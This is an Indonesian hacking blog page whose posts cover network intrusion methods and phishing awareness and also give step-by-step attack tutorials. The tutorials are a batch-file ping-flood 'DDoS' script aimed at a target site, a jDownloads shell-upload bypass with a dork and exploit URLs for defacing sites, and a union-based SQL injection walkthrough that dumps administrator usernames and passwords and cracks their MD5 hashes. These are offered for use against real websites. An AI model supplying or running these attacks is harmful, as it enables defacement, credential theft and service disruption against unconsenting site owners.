Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Metode Hacker Menyusup Jaringan Komputer dan cara mengatasinya !!!


Dalam sebuah jaringan, setiap komputer yang terhubung akan rawan terhadap penyusupan atau kejahatan dari luar. Ada dua bentuk aktivitas terhadapat jaringan komputer, yaitu hacking dan cracking. Hacking adalah usaha memasuki sebuah jaringan dengan maksud mengeksplorasi ataupun mencari kelemahan sistem jaringan secara ilegal. Cracking adalah usaha memasuki sebuah jaringan secara ilegal dengan maksud mencuri, mengubah ataupun menghancurkan file atau data yang disimpan di komputer – komputer yang ada di jaringan tersebut. Pelaku hacking disebut hacker, sedangkan pelaku cracking disebut cracker.
Beberapa metode yang digunakan hacker dan cracker untuk menyusup ke sebuah jaringan komputer, antara lain sebagai berikut :

1. Spoofing, merupakan salah satu bentuk penyusupan dengan cara memalsukan identitas user sehingga hacker dapat login ke sebuah jaringan komputer secara ilegal. Pemalsuan identitas user ini menyebabkan hacker dapat login seolah – olah sebagai user yang asli.

2. Scanner, merupakan salah satu bentuk penyusupan dengan menggunakan sebuah program yang secara otomatis mendeteksi salah satu bentuk penyusupan dengan menggunakan sebuah program yang secara otomatis mendeteksi kelemahan sistem keamanan sebuah jaringan komputer di jaringan lokal ataupun komputer di jaringan lain.

3. Sniffer, merupakan metode dengan cara menganalisis dan memonitor jaringan komputer. Program ini mengatur kartu jaringan ( LAN Card ) untuk memonitor dan menangkap semua lalu lintas paket data yang melalui jaringan, tanpa memperdulikan kepada siapa paket data tersebut dikirimkan.

4. Password Cracker, merupakan metode yang dilakukan dengan cara membukan password yang sudah di enkripsi ( dikodekan ). Selain itu, ada juga password cracker yang bekerja dengan cara menghancurkan sistem keamanan password.

5. Destructive device, merupakan metode berupa virus yang dibuat untuk menghancurkan data-data.

Untuk menjaga kemanan data pada saat dikirim dan disimpan dalam jaringan komputer, maka dibutuhkan teknik atau cara untuk mengamankan data – data tersebut. Teknik pengamanan data yang ada saat ini, antara lain sebagai berikut :

1. Kritografi
Kritografi adalah seni menyandikan data. Ada dua proses yang terjadi dalam kriptografi, yaitu proses enkripsi dan dekripsi. Proses enkripsi adalah proses mengubah data asli menjadi data sandi. Enkripsi juga dapat diartikan sebagai kode atau chipper. Proses dekripsi adalah proses mengembalikan data sandi menjadi data asli.

2. Firewall
Firewall merupakan program yang dipasang pada jaringan untuk memproteksi sistem komputer dan proxy. Filter digunakan untuk menyaring komunikasi agar hanya aplikasi tertentu saja yang dapat lewat, dan hanya komputer yang memiliki identitas tertentu saja yang dapat berhubungan. Sedangkan proxy untuk memberi izin ke pengguna dari dalam untuk mengakses internet seluas-luasnya, namun dari luar internet hanya dapat mengakses satu komputer tertentu saja.

3. Secure Socket Layer ( SSL )
Secure Socket Layer adakah suatu bentuk penyandian data sehingga informasi rahasia seperti nomor kartu kredit atau kontrol autentikasinya tidak dapat dibaca atau diakses oleh pihak lain selain pemiliknya atau server.

4. Pretty Good Privacy ( PGP )
Pretty Good Privacy adalah satu algoritma kemanan komunikasi data melalui internet untuk komunikasi harian semacam electronic mail. PGP merupakan gabungan antara sistem pembuatan digest, enkripsi simetris dan asimetris.

5. Sniffer Packet
Sniffer Packet yang juga dikenal sebagai Network Analyzers atau Ethernet Sniffer merupakan sebuah aplikasi yang dapat melihat lalu lintas data pada jaringan komputer. Sniffer paket dapat dipakai untuk mengatasi permasalahan pada jaringan komputer, mendeteksi adanya penyelundup dalam jaringan ( Network Inyudion ), memonitor penggunaan jaringan dan menyaring isi tertentu, semata-mata penggunaan jaringan lain dan mengumpulkan informasi pribadi yang memilikinya ( misalnya password ), serta dapat digunakan untuk Reverse Engineer pada jaringan.

Cara membuat tools DDoS sederhana dari Notepad

Cara membuat tools DDoS sederhana dari Notepad

DDoS adalah  kepanjangan dari Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang ‘menyerang’ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. DDoS attack adalah salah satu model dari DoS ( denial-of-service) attack.



Ok kali ini saya menulis sebuah artikel, yaitu Cara membuat tools DDoS sederhana dari Notepad

1. Buka Notepad


2. Masukan Kode Berikut Ini :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Kemudian Save/Crtl+S....






4. Beri nama Tools Az.bat/Sesuka hati kalian mau beri nama Apapun yang penting Ber-ekstensi " .bat " lalu Save.



5. Kemudian Buka file yang sudah dibuat tadi,




6. Maka akan seperti ini tampilan nya :





7. nah kalian tinggal memasukan web target pada kolom " Server-Target : ".
8. Jika sudah, kemudian Enter.

Dengan serangan yang kecil ini tidak berpengaruh namun jika dilakukan secara terus - menerus web target akan sedikit lambat jika di akses.


Sekian saja postingan ADMIN kali ini, semoga bermanfaat sobat.....

Mengenal teknik pencurian dengan Email Phising

Mengenal teknik pencurian dengan Email Phising



Di zaman sekarang orang sudah familiar dengan yang namanya e-mail, dari anak-anak sampai orang dewasa pun sudah tahu apa itu namanya e-mail. Karena fasilitas yang satu ini banyak sekali kegunaanya, kita bisa kirim data, kirim foto, ataupun kirim aplikasi dengan hanya hitungan detik, menit ato jam. Dan ini lebih cepat dari pada kita memakai jasa travel.
Tapi di sisi lain e-mail juga bisa membuat kita kehilangan apa yang kita punya, dalam hal ini biasanya adalah uang. Dalam kesempatan ini kita akan membicarakan masalah yang kaitannya dengan e-mail. Masalah yang akan kita bahas adalah tentang E-mail Phising.
Sebelumnya kita harus mengerti apakah itu yang namanya e-mail phising itu?
Phising merupakan teknik licik yang digunakan oleh pencuri  (cracker / hacker jahat) untuk menipu pengguna internet dengan cara mencuri informasi penting, biasanya hal ini berkenaan dengan informasi keuangan (nomor rekening dan kartu kredit) dan informasi login (ID dan password).
Biasanya sasaran para penjahat ini adalah, orang yang bertransaksi secara online melalui website perbankan. Dengan cara mereka membuat e-mail palsu yang sangat mirip sekali dengan e-mail resmi dari institusi keuangan. Biasanya isi pesan dari e-mail palsu ini sangat meyakinkan sekali, karena sangat mirip sekali dengan e-mail yang resmi. Sehingga orang yang tidak tahu pasti akan mengunjungi website tersebut.
Dan user yang sudah login ke website tersebut, pastinya akan mulai mengisikan formulir informasi tentang data pribadinya dan keuangannya. Maka informasi yang sudah tertulis tersebut sudah mulai masuk ke database penjahat atau hacker tersebut, dengan demikian para penjahat tersebut dengan sangat leluasa memindahkan data-data atau isi rekening tersebut ke rekening si penjahat tersebut. Biasanya orang yang sudah tertipu tersebut baru menyadarinya saat dirinya mendapatkan atau menerima surat pernyataan dari bank atau penerbit kartu kreditnya tersebut.
Sebaiknya untuk menghindari penipuan terhadap e-mail phising ini, kita harus mengerti beberapa tips agar kita tidak tertipu. Berikut ada beberapa tips dari kami, semoga tips tersebut dapat membantu anda.
  1. Jangan langsung membalas e-mail yang berasal dari insitusi keuangan, sebelum itu coba hubungi dulu pihak bank anda untuk memastikan kebenaran e-mail tersebut.
  2. Perhatikan kesalahan ketik atau tata bahasa yang kurang tepat pada pesan e-mail yang telah dikirimkan.
  3. Cermati simbol @ pada alamat website yang tertera pada pesan e-mail. Bisa jadi alamat website tersebut bertuliskan: www.garuda.com@www.admin.com. Browser tidak akan memproses semua tulisan sebelum simbol “@”. Jadi, pencuri bisa saja meletakkan alamat website pribadinya setelah simbol “@”. Website tersebutlah yang akan anda kunjungi, untuk itu sebaiknya selalu perhatikan alamat website yang tertera pada link.
  4. Biasanya beberapa karakter dalam alamat website bank bisa diganti dengan karakter yang hampir sama. Sebagai contoh, situs Asli milik Bank BCA yaitu www.kliktunai.com disamarkan menjadi  www.klicktunai.com. Sekilas memang terlihat sama. Tetapi jika anda tidak menyadari perbedaan ini akan sangat Fatal akibatnya.
  5. Saat website bank ditampilkan, perhatikan icon gembok yang berda di bagian bawah browser Website. Jika ada, berarti website tersebut aman. Jika icon gembok tidak ada, segera tutup browser tersebut.
Semoga Bermanfaat.....

Tutorial Deface Jdownloads Upload Shell Vulnerability

Tutorial Deface Jdownloads Upload Shell Vulnerability




Malam...
ketemu lagi sama saya :D
Kali ini Saya akan Membahas Cara Bypass Shell di JDownloads :)

Oke Langsung Gasss ~ Cara Uploadnya Sama Saja :)  

Dork : 
Powered by jDownloads  

Exploit : 
/index.php?option=com_jdownloads&Itemid=1&view=upload
or
/index.php?option=com_jdownloads&Itemid=1&task=upload 

Sekarang yang Jadi Pertanyaan Bagaimana Upload Shell di JDownloads ? :))
Easy ~ Cuma Perlu Ubah Shell kamu jadi Format shell.php.php.j 
 
Setelah itu Upload Seperti biasanya :)) 
Nanti Sesudah Ter-Upload ke Server Filenya akan Berubah Format Menjadi shell.php.j Magiccc wkwkw :v 

Shell Acces ? Seperti Biasa ~
www.target.com/images/jdownloads/screenshots/shell.php.j 
Setelah itu seterah kalian deh mau diapain :)

Jadinya Akan Seperti ini :))

Habis itu Diapain :))) ?
Terserah kakak lah wkwk Dosa ditanggung kalian yh

QL Injection for beginner

QL Injection for beginner

SQL Injection for beginner


Nah, ada yang minat untuk belajar hacking? Atau defacing? Ini nih, ada cara yang gampang buat beginner/pengguna awam nih. Coba dulu deh, SQL Injection. Pertama-tama, sebelum mendeface sebuah situs, kita bisa menggunakan "dork SQL Injection" atau kata kunci SQL Injection dengan bantuan google.
Ketik seperti ini di kotak search google :
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

Terus pilih salah satu webnya:
Contoh:
http://www.victim.com/detailproduct.php?id=64

Untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
Contoh:
http://www.victim.com/detailproduct.php?id=64'


Dan jika ada bug, akan muncul pesan error seperti ini:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1




Lalu, carilah columnnya. Gunakan perintah [ order by ]
Contoh:
http://www.victim.com/detailproduct.php?id=64 order by 1--

Dimulai dengan angka 1, selanjutnya 2, dan seterusnya, hingga muncul pesan error seperti ini :
Unknown column '19' in 'order clauseItu adalah pesan error yang ditampilkan saat mencoba “order by 19--“
Contoh:
http://www.victim.com/detailproduct.php?id=64 order by 19--

Jadi yang diambil adalah 19-1 = 18 (jumlah column ada 18 column)

Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Jangan lupa tambahkan tanda minus/kurang ( - ) didepan angka 64

Lalu akan muncul "angka ajaib" : 3, 11 dan 18
Kita pilih salah satunya saja, misalnya kita memilih angka 3

Terus kita cari versi Database MySQLnya dengan perintah [version()] atau [@@version] pada angka 3
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--


Dan ternyata muncul pesan/tulisan seperti ini:
5.0.90-community

Selanjutnya kita akan mencari table-nya dengan perintah "group_concat(table_name)" pada salah satu angka ajaib dengan menambahkan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 18
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where table_schema=database()--

Lalu akan muncul nama-nama table :
Contoh:
login,tbanner,tcatprod,tproduct,tset

Selanjutnya kita cari column dari table yang ada hubungannya dengan user dan password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh SQL. Coba cek di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dengan menambahkan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL
Ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
Tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name=0x6c6f67696e--

Dan ternyata muncul column : user,pass

Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL

Ganti column 1 dengan "user" dan column2 dengan "pass". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama "login"
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select 1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login—

Dan hasilnya : admin:admin
Jadi, yang ditemukan pada pembahasan kali ini adalah user = admin, sedangkan password = admin
Jika anda mendapatkan password yang berupa MD5 seperti "21232f297a57a5a743894a0e4a801fc3" atau yang lainnya, silahkan anda hash di sini atau bisa menggunakan tool Havij.
Contoh pesan yang ditampilkan :
admin: 21232f297a57a5a743894a0e4a801fc3
Nah, selesai. Tinggal mencari “page login administrator”nya. Silahkan anda cari sendiri, bisa menggunakan Havij juga. Semoga berhasil gan :D